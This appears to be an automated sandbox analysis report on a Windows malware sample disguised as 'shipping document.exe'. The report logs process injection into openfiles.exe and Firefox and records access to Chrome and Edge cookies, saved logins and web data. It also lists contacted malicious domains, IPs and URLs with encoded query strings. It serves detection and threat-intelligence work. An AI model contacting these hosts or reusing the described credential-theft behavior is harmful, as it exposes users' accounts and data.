Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: NULL target: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\shipping document.exe	Section loaded: NULL target: C:\Windows\SysWOW64\openfiles.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: NULL target: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: NULL target: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: oWRaEnEJAq.exe, 00000006.00000002.4110556530.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000000.1950565304.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4110889183.0000000001A60000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: oWRaEnEJAq.exe, 00000006.00000002.4110556530.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000000.1950565304.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4110889183.0000000001A60000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: oWRaEnEJAq.exe, 00000006.00000002.4110556530.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000000.1950565304.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4110889183.0000000001A60000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: oWRaEnEJAq.exe, 00000006.00000002.4110556530.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000000.1950565304.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4110889183.0000000001A60000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: Yara match	File source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipping document.exe.43a9970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipping document.exe.5ad0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipping document.exe.43a9970.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1680848791.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1677691413.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\openfiles.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\openfiles.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.16.36	www.mz3fk6g3.sbs	United States	15169	GOOGLEUS	false
162.240.81.18	tavernadoheroi.store	United States	46606	UNIFIEDLAYER-AS-1US	true
157.7.107.63	www.a-two-spa-salon.com	Japan	7506	INTERQGMOInternetIncJP	true
217.160.0.111	carliente.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
80.240.20.220	www.jthzbrdb.fun	Germany	20473	AS-CHOOPAUS	true
64.190.62.22	www.paydayloans3.shop	United States	11696	NBS11696US	true
34.149.87.45	td-ccm-neg-87-45.wixdns.net	United States	2686	ATGS-MMD-ASUS	true
203.161.46.103	www.heldhold.life	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
118.27.122.214	www.kansaiwoody.com	Japan	7506	INTERQGMOInternetIncJP	true
31.186.11.254	levelstep.online	Turkey	199484	BETAINTERNATIONALTR	true

Name	Malicious	Antivirus Detection	Reputation
http://www.paydayloans3.shop/3g97/	true	Avira URL Cloud: safe	unknown
http://www.jthzbrdb.fun/3g97/?AlB=sdJPX&12l42=0byNfP8xYbFTvv3TFTBCb86kR2BGbvQk+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhMgT0gLImR5/DqviqEDtH5dgpFLFfPLyFVKE=	true	Avira URL Cloud: safe	unknown
http://www.brothedboil.com/3g97/	true	Avira URL Cloud: safe	unknown
http://www.tavernadoheroi.store/3g97/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.a-two-spa-salon.com/3g97/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.corvidemporium.com/3g97/?12l42=xT2trqCQSb0YGfwnfC7AAWCSgoebgz86z2nMETOowAc4zyKeScBuNk+zQrcmduROogVqNtfeQZVF2OAhYZAs5wKafa9/anE/xTNtRCFpw92mm1bEow/bC00=&AlB=sdJPX	true	Avira URL Cloud: safe	unknown
http://www.carliente.com/3g97/	true	Avira URL Cloud: safe	unknown
http://www.mz3fk6g3.sbs/3g97/	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.kansaiwoody.com/3g97/	true	Avira URL Cloud: safe	unknown
http://www.a-two-spa-salon.com/3g97/?12l42=14Ldh71M1tAlq614+H+qL8FcHbYJSqGFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkSH7srevI7CXU30k1a21fOzbLf05e9HUvJZA=&AlB=sdJPX	true	Avira URL Cloud: safe	unknown
http://www.levelstep.online/3g97/?AlB=sdJPX&12l42=chI4PXqGf2akS9KXcN1/fIedDZpx1haPemMkxCQLjjdC+0LHJVcL8RVSGr04qmANi3qgGmUbQWZg1h9oBh32jeRnCnRBYigKMCJed0uSuMGI415b3fHmBd4=	true	Avira URL Cloud: safe	unknown
http://www.tavernadoheroi.store/3g97/?12l42=i+yp5adQUIH0VEgvOjK1asLzAf4iESqSDXIw4u3g+VG2ev6y5D4E1hL0oESk2gA2rBhm9fxiezQ8IT1HT+LmxelGkpS4OcyZPgZgITeIYkhl82tlqROkzZ0=&AlB=sdJPX	true	Avira URL Cloud: safe	unknown
http://www.carliente.com/3g97/?AlB=sdJPX&12l42=pss1I4hPKcXAgTeMienjdKFyes9H9oPLrlXUMEqkxJwN3Lu9fPUDc8IPlpsJO9uNl7TAjBTqm2QSFPkGLslINQQyxLsDbCNKxleUNo2npjmmo3Auov63B2Q=	true	Avira URL Cloud: safe	unknown
http://www.mz3fk6g3.sbs/3g97/?12l42=ZDaHJbFbnHAFPJixhC0W5VJcO+3r+/EbU9/fBM2jNZ9+Ym38hIZ/X5pUYkV2fcPscAyJxVIUpy5G03sBlccn/BoOXNW31gfQYe8OGfTtnGJDjF2r8y9L4VM=&AlB=sdJPX	false	Avira URL Cloud: safe	unknown
http://www.heldhold.life/3g97/	true	Avira URL Cloud: safe	unknown
http://www.levelstep.online/3g97/	true	Avira URL Cloud: safe	unknown
http://www.tondex.finance/3g97/	true	Avira URL Cloud: safe	unknown
http://www.corvidemporium.com/3g97/	true	Avira URL Cloud: safe	unknown
http://www.brothedboil.com/3g97/?12l42=SimubthO8j6ps9851O6iFrPFbhU0j9rq0/tYQBfzEgGK5hVM85jEDi8N6ZmkhSeBx8n/pYDrpewbJx/zj6rVSge67MmYz8zyJ6w88vNyo3JtRae+fbqeQKU=&AlB=sdJPX	true	Avira URL Cloud: safe	unknown
http://www.paydayloans3.shop/3g97/?12l42=+UthD+705U1ao7DlNG8D0XAg53Vx3iw389CE+agLgXg1A2DbEeFYSszaWdWCIKr2NLn015a/QKEJl6wBw76YOQKFwTcvF/Pv+Bjw8BucK5rNlKIw4A0tIOg=&AlB=sdJPX	true	Avira URL Cloud: safe	unknown
http://www.heldhold.life/3g97/?AlB=sdJPX&12l42=meGryHO7z/6rT923FBL9q9LP9fsOajdjArpVhNvG0WuyKOeyc4yYaP5CwAgWJzIE3e4WxKJNZpro8/ttq32sXWhgj4qMLx7ltRSWVCmHVfZWVpKDtZXBa18=	true	Avira URL Cloud: safe	unknown

Windows Analysis Report shipping document.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
shipping document.exe

Malware Threat Intel
Provided by

ID:	1430793
Product:	CloudBasic
Start time:	07:24:26
Start date:	24.04.2024
Sample:	shipping document.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	180165361384e56db00389733f0c54f5
SHA1:	1d48e601e3ba392fafde82b4a7fc0a39fba0a382
SHA256:	48ca70c01e870434304ccd508ef88d824b8d3c9588c990402dae450a5e56f73c
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\shipping document.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Temp\03F67l1929	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3